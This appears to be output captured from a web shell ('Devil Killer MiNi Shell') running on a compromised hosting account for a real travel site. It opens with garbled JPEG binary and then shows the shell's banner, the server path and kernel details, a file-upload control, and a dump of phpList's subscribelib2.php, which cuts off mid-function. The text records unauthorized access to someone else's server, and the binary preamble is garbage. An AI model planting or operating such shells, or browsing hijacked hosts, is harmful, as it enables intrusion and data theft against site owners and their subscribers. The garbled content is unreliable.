JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /hermes/bosweb01/sb_web/b2920/ridhanshtravels.com/phplists/admin/

Linux boscustweb5004.eigbox.net 5.4.91 #1 SMP Wed Jan 20 18:10:28 EST 2021 x86_64
Upload File :
Current File : //hermes/bosweb01/sb_web/b2920/ridhanshtravels.com/phplists/admin/subscribelib2.php

<?php

require_once dirname(__FILE__).'/accesscheck.php';

if (empty($id) && isset($_GET['id'])) {
    $id = sprintf('%d', $_GET['id']);
} elseif (!isset($id)) {
    $id = 0;
}

if (!$id && $_GET['page'] != 'import1') {
    Fatal_Error('Invalid call');
    exit;
}
require_once dirname(__FILE__).'/date.php';
$date = new Date();

//# Check if input is complete
$allthere = 1;
$subscribepagedata = PageData($id);
if (isset($subscribepagedata['language_file']) && is_file(dirname(__FILE__).'/../texts/'.basename($subscribepagedata['language_file']))) {
    @include_once dirname(__FILE__).'/../texts/'.basename($subscribepagedata['language_file']);
}
// Allow customisation per installation
if (is_file($_SERVER['DOCUMENT_ROOT'].'/'.basename($GLOBALS['language_module']))) {
    include_once $_SERVER['DOCUMENT_ROOT'].'/'.basename($GLOBALS['language_module']);
}
if (!empty($data['language_file']) && is_file($_SERVER['DOCUMENT_ROOT'].'/'.basename($data['language_file']))) {
    include_once $_SERVER['DOCUMENT_ROOT'].'/'.basename($data['language_file']);
}

$required = array();   // id's of missing attribbutes '
if (count($subscribepagedata)) {
    $attributes = explode('+', $subscribepagedata['attributes']);
    foreach ($attributes as $attribute) {
        if (isset($subscribepagedata[sprintf('attribute%03d',
                    $attribute)]) && $subscribepagedata[sprintf('attribute%03d', $attribute)]
        ) {
            list($dummy, $dummy2, $dummy3, $req) = explode('###',
                $subscribepagedata[sprintf('attribute%03d', $attribute)]);
            if ($req) {
                array_push($required, $attribute);
            }
        }
    }
} else {
    $req = Sql_Query(sprintf('select * from %s', $GLOBALS['tables']['attribute']));
    while ($row = Sql_Fetch_Array($req)) {
        if ($row['required']) {
            array_push($required, $row['id']);
        }
    }
}

if (count($required)) {
    $required_ids = implode(',', $required);
    // check if all required attributes have been entered;
    if ($required_ids) {
        $res = Sql_Query("select * from {$GLOBALS['tables']['attribute']} where id in ($required_ids)");
        $allthere = 1;
        $missing = '';
        while ($row = Sql_Fetch_Array($res)) {
            $fieldname = 'attribute'.$row['id'];
            $thisonemissing = 0;
            if ($row['type'] != 'hidden') {
                $thisonemissing = empty($_POST[$fieldname]);
                if ($thisonemissing) {
                    $missing .= $row['name'].', ';
                }
                $allthere = $allthere && !$thisonemissing;
            }
        }
        $missing = substr($missing, 0, -2);
        if ($allthere) {
            $missing = '';
        }
    }
} else {
    $missing = '';
}

// If need to check for double entry of email address

if (isset($subscribepagedata['emaildoubleentry']) && $subscribepagedata['emaildoubleentry'] == 'yes') {
    if (!(isset($_POST['email']) && isset($_POST['emailconfirm']) && $_POST['email'] == $_POST['emailconfirm'])) {
        $allthere = 0;
        $missing = $GLOBALS['strEmailsNoMatch'];
    }
}

// check if the lists should be displayed by category
if (isset($subscribepagedata['showcategories']) && $subscribepagedata['showcategories'] == 'yes') {
    $GLOBALS['showCat'] = true;
}

// anti spambot check
if (!empty($_POST['VerificationCodeX'])) {
    if (NOTIFY_SPAM) {
        $msg = $GLOBALS['I18N']->get('
--------------------------------------------------------------------------------
    This is a notification of a possible spam attack to your phplist subscribe page.
    The data submitted has been copied below, so you can check whether this was actually the case.
    The submitted data has been converted into non-html characters, for security reasons.
    If you want to stop receiving this message, set

     define("NOTIFY_SPAM",0);

     in your phplist config file.

     This subscriber has NOT been added to the database.
     If there is an error, you will need to  add them manually.
--------------------------------------------------------------------------------  ');
        foreach ($_REQUEST as $key => $val) {
            $msg .= "\n".'Form field: '.htmlentities($key)."\n".'================='."\nSubmitted value: ".htmlentities($val)."\n".'=============='."\n\n";
        }
        foreach ($_SERVER as $key => $val) {
            $msg .= "\n".'HTTP Server Data: '.htmlentities($key)."\n".'================='."\nValue: ".htmlentities($val)."\n".'=============='."\n\n";
        }
        sendAdminCopy(s('phplist Spam blocked'), "\n".$msg);
    }
    unset($msg);

    return;
}
$pluginErrors = array();

foreach ($GLOBALS['plugins'] as $pluginname => $plugin) {
    $pluginResult = $plugin->validateSubscriptionPage($subscribepagedata);
    if (!empty($pluginResult)) {
        $pluginErrors[] = $pluginResult;
        $allthere = 0;
    }
}

if (!isset($_POST['passwordreq'])) {
    $_POST['passwordreq'] = '';
}
if (!isset($_POST['password'])) {
    $_POST['password'] = '';
}

if ($allthere && ASKFORPASSWORD && ($_POST['passwordreq'] || $_POST['password'])) {
    if (empty($_POST['password']) || $_POST['password'] !== $_POST['password_check']) {
        $allthere = 0;
        $missing = $GLOBALS['strPasswordsNoMatch'];
    }
    if ($_POST['email']) {
        $curpwd = Sql_Fetch_Row_Query(sprintf('select password from %s where email = "%s"',
            $GLOBALS['tables']['user'], sql_escape($_POST['email'])));

        if ($curpwd[0] && $_POST['password'] !== $curpwd[0]) {
            $missing = $GLOBALS['strInvalidPassword'];
        }
    }
}

if (isset($_POST['email']) && !empty($GLOBALS['check_for_host'])) {
    list($username, $domaincheck) = explode('@', $_POST['email']);
//  $mxhosts = array();
//  $validhost = getmxrr ($domaincheck,$mxhosts);
    $validhost = checkdnsrr($domaincheck, 'MX') || checkdnsrr($domaincheck, 'A');
} else {
    $validhost = 1;
}

$listsok = ((!ALLOW_NON_LIST_SUBSCRIBE && isset($_POST['list']) && is_array($_POST['list'])) || ALLOW_NON_LIST_SUBSCRIBE);

if (isset($_POST['subscribe']) && is_email($_POST['email']) && $listsok && $allthere && $validhost) {
    $history_entry = '';
    // make sure to save the correct data
    if ($subscribepagedata['htmlchoice'] == 'checkfortext' && empty($_POST['textemail'])) {
        $htmlemail = 1;
    } else {
        $htmlemail = !empty($_POST['htmlemail']);
    }

    // now check whether this user already exists.
    $email = $_POST['email'];
    if (preg_match("/(.*)\n/U", $email, $regs)) {
        $email = $regs[1];
    }
    $result = Sql_query(sprintf('select * from %s where email = "%s"', $GLOBALS['tables']['user'], sql_escape($email)));
    if (!Sql_affected_rows()) {
        // they do not exist, so add them
        $query = sprintf('insert into %s (email,entered,uniqid,confirmed,htmlemail,subscribepage,uuid) values("%s",now(),"%s",0,%d,%d,"%s")',
            $GLOBALS['tables']['user'], sql_escape($email), getUniqid(), $htmlemail, $id, (string) uuid::generate(4));
        $result = Sql_query($query);
        $userid = Sql_Insert_Id();
        addSubscriberStatistics('total users', 1);
    } else {
        // they do exist, so update the existing record
        // read the current values to compare changes
        $old_data = Sql_fetch_array($result);
        if (ASKFORPASSWORD && $old_data['password']) {
            $encP = encryptPass($_POST['password']);
            $canlogin = !empty($encP) && !empty($_POST['password']) && $encP == $old_data['password'];
            //     print $canlogin.' '.$_POST['password'].' '.$encP.' '. $old_data["password"];
            if (!$canlogin) {
                $msg = '<p class="error">'.$GLOBALS['strUserExists'].'</p>';
                $msg .= '<p class="information">'.$GLOBALS['strUserExistsExplanationStart'].
                    sprintf('<a href="%s&amp;email=%s">%s</a>', getConfig('preferencesurl'), $email,
                        $GLOBALS['strUserExistsExplanationLink']).
                    $GLOBALS['strUserExistsExplanationEnd'].'</p>';

                return;
            }
        }

        // https://mantis.phplist.com/view.php?id=15557, disallow re-subscribing existing subscribers
        if (!SILENT_RESUBSCRIBE) {
            $msg = '<div class="error missing"><h4>'.$GLOBALS['strUserExistsResubscribe'].'</h4>';
            $msg .= '<p>';
            $msg .= sprintf($GLOBALS['strUserExistsResubscribeExplanation'], getConfig('preferencesurl'));
            $msg .= '</p></div>';

            return;
        }

        $userid = $old_data['id'];
        $old_data = array_merge($old_data, getUserAttributeValues('', $userid));
        $history_entry = ''; //http://'.getConfig("website").$GLOBALS["adminpages"].'/?page=user&amp;id='.$userid."\n\n";

        $query = sprintf('update %s set email = "%s",htmlemail = %d,subscribepage = %d where id = %d',
            $GLOBALS['tables']['user'], addslashes($email), $htmlemail, $id, $userid);
        $result = Sql_query($query);
    }

    if (ASKFORPASSWORD && $_POST['password']) {
        $newpassword = encryptPass($_POST['password']);
        // see whether is has changed
        $curpwd = Sql_Fetch_Row_Query("select password from {$GLOBALS['tables']['user']} where id = $userid");
        if ($newpassword != $curpwd[0]) {
            $storepassword = 'password = "'.$newpassword.'"';
            Sql_query("update {$GLOBALS['tables']['user']} set passwordchanged = now(),$storepassword where id = $userid");
        } else {
            $storepassword = '';
        }
    } else {
        $storepassword = '';
    }

    // subscribe to the lists
    $lists = '';
    $subscriptions = array(); //# used to keep track of which admins to alert

    if (isset($_POST['list']) && is_array($_POST['list'])) {
        foreach ($_POST['list'] as $key => $val) {
            if ($val == 'signup' && !isPrivateList($key)) { // make sure that the list is not private
                $key = sprintf('%d', $key);
                if (!empty($key)) {
                    $result = Sql_query(sprintf('replace into %s (userid,listid,entered) values(%d,%d,now())',
                        $GLOBALS['tables']['listuser'], $userid, $key));
                    $lists .= "\n  * ".listname($key);
                    $subscriptions[] = $key;

                    addSubscriberStatistics('subscribe', 1, $key);
                } else {
                    //# hack attempt...
                    exit;
                }
            }
        }
    }

    // remember the users attributes
    // make sure to only remember the ones from this subscribe page
    $history_entry .= 'Subscribe page: '.$id;
    array_push($attributes, 0);
    $attids = join_clean(',', $attributes);
    if ($attids && $attids != '') {
        $res = Sql_Query('select * from '.$GLOBALS['tables']['attribute']." where id in ($attids)");
        while ($row = Sql_Fetch_Array($res)) {
            $fieldname = 'attribute'.$row['id'];
            if (!array_key_exists($fieldname, $_POST)) {
                continue;
            }
            $value = $_POST[$fieldname];
            //    if ($value != "") {
            if ($row['type'] == 'date') {
                $value = $date->getDate($fieldname);
            } elseif (is_array($value)) {
                $newval = array();
                foreach ($value as $val) {
                    array_push($newval, sprintf('%0'.$checkboxgroup_storesize.'d', $val));
                }
                $value = implode(',', $newval);
            } elseif ($row['type'] != 'textarea') {
                if (preg_match("/(.*)\n/U", $value, $regs)) {
                    $value = $regs[1];
                }
            }
            Sql_Query(sprintf('replace into %s (attributeid,userid,value) values("%s","%s","%s")',
                $GLOBALS['tables']['user_attribute'], $row['id'], $userid, $value));
            $history_entry .= "\n".$row['name'].' = '.UserAttributeValue($userid, $row['id']);
            //    }
        }
    }
    $information_changed = 0;
    if (isset($old_data) && is_array($old_data)) {
        $history_subject = 'Re-Subscription';
        // when they submit a new subscribe
        $current_data = Sql_Fetch_Array_Query(sprintf('select * from %s where id = %d', $GLOBALS['tables']['user'],
            $userid));
        $current_data = array_merge($current_data, getUserAttributeValues('', $userid));
        foreach ($current_data as $key => $val) {
            if (!is_numeric($key)) {
                if ($old_data[$key] != $val && $key != 'password' && $key != 'modified') {
                    $information_changed = 1;
                    $history_entry .= "\n$key = $val\n*changed* from $old_data[$key]";
                }
            }
        }
        if (!$information_changed) {
            $history_entry .= "\nNo user details changed";
        }
    } else {
        $history_subject = 'Subscription';
    }

    $history_entry .= "\n\nList Membership: \n$lists\n";

    $subscribemessage = str_ireplace('[LISTS]', $lists, getUserConfig("subscribemessage:$id", $userid));

    $blacklisted = isBlackListed($email);

    echo '<title>'.$GLOBALS['strSubscribeTitle'].'</title>';
    echo $subscribepagedata['header'];

    if (isset($_SESSION['adminloggedin']) && $_SESSION['adminloggedin'] && !(isset($_GET['p']) && $_GET['p'] == 'asubscribe')) {
        echo '<p class="information"><b>You are logged in as '.$_SESSION['logindetails']['adminname'].'</b></p>';
        echo '<p><a href="'.$adminpages.'" class="button">Back to the main admin page</a></p>';

        if ($_POST['makeconfirmed'] && !$blacklisted) {
            $sendrequest = 0;
            Sql_Query(sprintf('update %s set confirmed = 1 where email = "%s"', $GLOBALS['tables']['user'], $email));
            addUserHistory($email, $history_subject.' by '.$_SESSION['logindetails']['adminname'], $history_entry);
        } elseif ($_POST['makeconfirmed']) {
            echo '<p class="information">'.$GLOBALS['I18N']->get('Email is blacklisted, so request for confirmation has been sent.').'<br/>';
            echo $GLOBALS['I18N']->get('If user confirms subscription, they will be removed from the blacklist.').'</p>';

            $sendrequest = 1;
        } else {
            $sendrequest = 1;
        }
    } else {
        $sendrequest = 1;
    }

    // personalise the thank you page
    if ($subscribepagedata['thankyoupage']) {
        $thankyoupage = $subscribepagedata['thankyoupage'];
    } else {
        $thankyoupage = '<h3>'.$strThanks.'</h3>'.'<p class="information">'.$strEmailConfirmation.'</p>';
    }

    $thankyoupage = str_ireplace('[email]', $email, $thankyoupage);

    $user_att = getUserAttributeValues($email);

    if (count($user_att)) {
        foreach ($user_att as $att_name => $att_value) {
            $thankyoupage = str_ireplace('['.$att_name.']', $att_value, $thankyoupage);
        }
    }

    if (is_array($GLOBALS['plugins'])) {
        reset($GLOBALS['plugins']);
        foreach ($GLOBALS['plugins'] as $name => $plugin) {
            $thankyoupage = $plugin->parseThankyou($id, $userid, $thankyoupage);
        }
    }

    if ($sendrequest && $listsok) { //is_array($_POST["list"])) {
        if (RFC_DIRECT_DELIVERY) {
            $ok = sendMailDirect($email, getConfig("subscribesubject:$id"), $subscribemessage,
                system_messageheaders($email), $envelope, 1);
            if (!$ok) {
                echo '<h3>'.$strEmailFailed.'</h3>';
                echo '<p>'.$GLOBALS['smtpError'].'</p>';
            } else {
                sendAdminCopy('Lists subscription', "\n".$email." has subscribed\n\n$history_entry",
                    $subscriptions);
                addUserHistory($email, $history_subject, $history_entry);
                echo $thankyoupage;
            }
        } elseif (sendMail($email, getConfig("subscribesubject:$id"), $subscribemessage, system_messageheaders($email),
            $envelope, 1)) {
            sendAdminCopy('Lists subscription', "\n".$email." has subscribed\n\n$history_entry", $subscriptions);
            addUserHistory($email, $history_subject, $history_entry);
            echo $thankyoupage;
        } else {
            echo '<h3>'.$strEmailFailed.'</h3>';
            if ($blacklisted) {
                echo '<p class="information">'.$GLOBALS['strYouAreBlacklisted'].'</p>';
            }
        }
    } else {
        echo $thankyoupage;
        if ($_SESSION['adminloggedin']) {
            echo '<p class="information">User has been added and confirmed</p>';
        }
    }

    echo '<p class="information">'.$PoweredBy.'</p>';
    echo $subscribepagedata['footer'];
    //  exit;
    // Instead of exiting here, we return 2. So in lists/index.php
    // We can decide, whether to show subscribe page or not.
    //# issue 6508
    return 2;
} elseif (isset($_POST['update']) && $_POST['update'] && is_email($_POST['email']) && $allthere) {
    $email = trim($_POST['email']);
    if (preg_match("/(.*)\n/U", $email, $regs)) {
        $email = $regs[1];
    }
    if ($_GET['uid']) {
        $req = Sql_Fetch_Row_Query(sprintf('select id from %s where uniqid = "%s"',
            $GLOBALS['tables']['user'], $_GET['uid']));
        $userid = $req[0];
    } else {
        // This could be abused and is not required
        // $req = Sql_Fetch_Row_query("select id from {$GLOBALS['tables']['user']} where email = \"".sql_escape($_GET['email']).'"');
        // $userid = $req[0];
        $userid = false;
    }
    if (!$userid) {
        Fatal_Error('Error, no such user');
    }
    // update the existing record, check whether the email has changed
    $req = Sql_Query("select * from {$GLOBALS['tables']['user']} where id = $userid");
    $data = Sql_fetch_array($req);

    // check that the password was provided if required
    // we only require a password if there is one, otherwise people are blocked out
    // when switching to requiring passwords
    if (ASKFORPASSWORD && $data['password']) {
        // they need to be "logged in" for this
        if (empty($_SESSION['userloggedin'])) {
            Fatal_Error('Access Denied');
            exit;
        }
        $checkpassword = '';
        $allow = 0;
        // either they have to give the current password, or given two new ones
        if (ENCRYPTPASSWORD) {
            $checkpassword = encryptPass($_POST['password']);
        } else {
            $checkpassword = sprintf('%s', $_POST['password']);
        }
        if (!empty($_POST['password_check'])) {
            $allow = $_POST['password_check'] == $_POST['password'] && !empty($_POST['password']);
        } else {
            $allow = (!empty($_POST['password']) && $data['password'] == $checkpassword) || empty($_POST['password']);
        }

        if (!$allow) {
            // @@@ this check should be done above, so the error can be embedded in the template
            echo $GLOBALS['strPasswordsNoMatch'];
            exit;
        }
    }

    // check whether they are changing to an email that already exists, should not be possible
    $req = Sql_Query("select uniqid from {$GLOBALS['tables']['user']} where email = \"$email\"");
    if (Sql_Affected_Rows()) {
        $row = Sql_Fetch_Row($req);
        if ($row[0] != $_GET['uid']) {
            Fatal_Error('Cannot change to that email address.
      <br/>This email already exists.
      <br/>Please use the preferences URL for this email to make updates.
      <br/>Click <a href="' .getConfig('preferencesurl')."&amp;email=$email\">here</a> to request your personal location");
            exit;
        }
    }
    // read the current values to compare changes
    $old_data = Sql_Fetch_Array_Query(sprintf('select * from %s where id = %d', $GLOBALS['tables']['user'], $userid));
    $old_data = array_merge($old_data, getUserAttributeValues('', $userid));
    $history_entry = ''; //'http://'.getConfig("website").$GLOBALS["adminpages"].'/?page=user&amp;id='.$userid."\n\n";

    if (ASKFORPASSWORD && $_POST['password']) {
        if (ENCRYPTPASSWORD) {
            $newpassword = encryptPass($_POST['password']);
        } else {
            $newpassword = sprintf('%s', $_POST['password']);
        }
        // see whether is has changed
        $curpwd = Sql_Fetch_Row_Query("select password from {$GLOBALS['tables']['user']} where id = $userid");
        if ($_POST['password'] != $curpwd[0]) {
            $storepassword = 'password = "'.$newpassword.'",';
            Sql_query("update {$GLOBALS['tables']['user']} set passwordchanged = now() where id = $userid");
            $history_entry .= "\nUser has changed their password\n";
            addSubscriberStatistics('password change', 1);
        } else {
            $storepassword = '';
        }
    } else {
        $storepassword = '';
    }

    // We want all these to be set, albeit to empty string
    foreach (array('htmlemail') as $sUnsubscribeFormVar) {
        if (!isset($_POST[$sUnsubscribeFormVar])) {
            $_POST[$sUnsubscribeFormVar] = '';
        }
    }

    $query = sprintf('update %s set email = "%s", %s htmlemail = %d where id = %d',
        $GLOBALS['tables']['user'], sql_escape($_POST['email']), $storepassword, $_POST['htmlemail'], $userid);
    //print $query;
    $result = Sql_query($query);
    if (strtolower($data['email']) != strtolower($email)) {
        $emailchanged = 1;
        Sql_Query(sprintf('update %s set confirmed = 0 where id = %d', $GLOBALS['tables']['user'], $userid));
    }

    // subscribe to the lists
    // first take them off the ones, then re-subscribe
    if ($subscribepagedata['lists']) {
        $subscribepagedata['lists'] = preg_replace("/^\,/", '', $subscribepagedata['lists']);
        Sql_query(sprintf('delete from %s where userid = %d and listid in (%s)', $GLOBALS['tables']['listuser'],
            $userid, $subscribepagedata['lists']));
        $liststat = explode(',', $subscribepagedata['lists']);
    } else {
        Sql_query(sprintf('delete from %s where userid = %d', $GLOBALS['tables']['listuser'], $userid));
    }

    $lists = '';
    if (is_array($_POST['list'])) {
        foreach ($_POST['list'] as $key => $val) {
            if ($val == 'signup' && !isPrivateList($key)) {
                $result = Sql_query(sprintf('replace into %s (userid,listid,entered) values(%d,%d,now())',$GLOBALS['tables']['listuser'],$userid,$key));
//        $lists .= "  * ".$_POST["listname"][$key]."\n";
            }
        }
    }
    // check list membership
    $subscriptions = array();
    $req = Sql_Query(sprintf('select * from %s listuser,%s list where listuser.userid = %d and listuser.listid = list.id and list.active',
        $GLOBALS['tables']['listuser'], $GLOBALS['tables']['list'], $userid));
    while ($row = Sql_Fetch_Array($req)) {
        $lists .= '  * '.listName($row['listid'])."\n";
        array_push($subscriptions, $row['listid']);
    }

    if ($lists == '') {
        $lists = 'No Lists';
    }
    if ($lists == '') {
        $lists = 'No Lists';
    }

    // We want all these to be set, albeit to empty string
    foreach (array('datachange', 'htmlemail', 'information_changed', 'emailchanged') as $sUnsubscribeVar) {
        if (!isset(${$sUnsubscribeVar})) {
            ${$sUnsubscribeVar} = '';
        }
    }

    $datachange .= "$strEmail : ".$email."\n";
    if ($subscribepagedata['htmlchoice'] != 'textonly'
        && $subscribepagedata['htmlchoice'] != 'htmlonly'
    ) {
        $datachange .= "$strSendHTML : ";
        $datachange .= $_POST['htmlemail'] ? "$strYes\n" : "$strNo\n";
    }

    // remember the users attributes
    $attids = join_clean(',', $attributes);
    if ($attids && $attids != '') {
        $res = Sql_Query('select * from '.$GLOBALS['tables']['attribute']." where id in ($attids)");
        while ($attribute = Sql_Fetch_Array($res)) {
            $fieldname = 'attribute'.$attribute['id'];
            if (isset($_POST[$fieldname])) {
                $value = $_POST[$fieldname]; //# is being sanitised below, depending on attribute type
            } else {
                $value = '';
            }
            $replace = 1; //isset($_POST[$fieldname]);
            if ($attribute['type'] == 'date') {
                $value = $date->getDate($fieldname);
            } elseif (is_array($value)) {
                $values = array();
                foreach ($value as $val) {
                    array_push($values, sprintf('%0'.$checkboxgroup_storesize.'d', $val));
                }
                $value = implode(',', $values);
            } elseif ($attribute['type'] != 'textarea') {
                if (preg_match("/(.*)\n/U", $value, $regs)) {
                    $value = $regs[1];
                }
            }
            if ($replace) {
                Sql_query(sprintf('replace into %s (attributeid,userid,value) values("%s","%s","%s")',
                    $GLOBALS['tables']['user_attribute'], $attribute['id'], $userid, $value));
                if ($attribute['type'] != 'hidden') {
                    $datachange .= strip_tags($attribute['name']).' : ';
                    if ($attribute['type'] == 'checkbox') {
                        $datachange .= $value ? $strYes : $strNo;
                    } elseif ($attribute['type'] != 'date' && $attribute['type'] != 'textline' && $attribute['type'] != 'textarea') {
                        $datachange .= AttributeValue($attribute['tablename'], $value);
                    } else {
                        $datachange .= stripslashes($value);
                    }
                    $datachange .= "\n";
                }
            }
        }
    }
    $current_data = Sql_Fetch_Array_Query(sprintf('select * from %s where id = %d', $GLOBALS['tables']['user'],
        $userid));
    $current_data = array_merge($current_data, getUserAttributeValues('', $userid));
    foreach ($current_data as $key => $val) {
        if (!is_numeric($key)) {
            if ($old_data[$key] != $val && $key != 'password' && $key != 'modified') {
                $information_changed = 1;
                $history_entry .= "$key = $val\n*changed* from $old_data[$key]\n";
            }
        }
    }
    if (!$information_changed) {
        $history_entry .= "\nNo user system details changed";
    }
    $history_entry .= "\n\nList Membership: \n$lists\n";

    $message = str_replace('[LISTS]', $lists, getUserConfig('updatemessage', $userid));
    $message = str_replace('[USERDATA]', $datachange, $message);
    if ($emailchanged) {
        $newaddressmessage = str_replace('[CONFIRMATIONINFO]', getUserConfig('emailchanged_text', $userid), $message);
        $oldaddressmessage = str_replace('[CONFIRMATIONINFO]', getUserConfig('emailchanged_text_oldaddress', $userid),
            $message);
    } else {
        $message = str_replace('[CONFIRMATIONINFO]', '', $message);
    }

    echo '<title>'.$GLOBALS['strPreferencesTitle'].'</title>';
    echo $subscribepagedata['header'];
    if (!TEST) {
        if ($emailchanged) {
            if (sendMail($data['email'], getConfig('updatesubject'), $oldaddressmessage, system_messageheaders($email),
                    $envelope) &&
                sendMail($email, getConfig('updatesubject'), $newaddressmessage, system_messageheaders($email),
                    $envelope)
            ) {
                $ok = 1;
                sendAdminCopy('Lists information changed',
                    "\n".$data['email']." has changed their information.\n\nThe email has changed to $email.\n\n$history_entry",
                    $subscriptions);
                addUserHistory($email, 'Change', $history_entry);
            } else {
                $ok = 0;
            }
        } else {
            if (sendMail($email, getConfig('updatesubject'), $message, system_messageheaders($email), $envelope)) {
                $ok = 1;
                sendAdminCopy('Lists information changed',
                    "\n".$data['email']." has changed their information\n\n$history_entry", $subscriptions);
                addUserHistory($email, 'Change', $history_entry);
            } else {
                $ok = 0;
            }
        }
    } else {
        $ok = 1;
    }
    if ($ok) {
        echo '<h3>'.$GLOBALS['strPreferencesUpdated'].'</h3>';
        if ($emailchanged) {
            echo $strPreferencesEmailChanged;
        }
        echo '<br/>';
        if ($_GET['p'] == 'preferences') {
            //0013134: turn off the confirmation email when an existing subscriber changes preference.
            $ok = 1;
        } else {
            echo $strPreferencesNotificationSent;
        }
    } else {
        $isThisBlacklisted = isBlackListed($email);
        if ($isThisBlacklisted) {
            echo '<p class="information">'.$GLOBALS['strYouAreBlacklisted'].'</p>';
        } else {
            echo '<h3>'.$strEmailFailed.'</h3>';
        }

    }
    echo '<p class="information">'.$PoweredBy.'</p>';
    echo $subscribepagedata['footer'];
    // exit;
    // Instead of exiting here, we return 3. So in lists/index.php
    // We can decide, whether to show preferences page or not.
    //# mantis issue 6508
    return 3;
}

if (isset($_POST['subscribe']) || isset($_POST['update'])) {
    $format = '<div class="error missing">%s</div>'."\n";
    $msg = '';

    if (!is_email($_POST['email'])) {
        $msg .= sprintf($format, $strEnterEmail);
    }
    if (!$validhost) {
        $msg .= sprintf($format, $strInvalidHostInEmail);
    }
    if ($missing) {
        $msg .= sprintf($format, "$strValuesMissing: $missing");
    }
    if (!isset($_POST['list']) && !ALLOW_NON_LIST_SUBSCRIBE) {
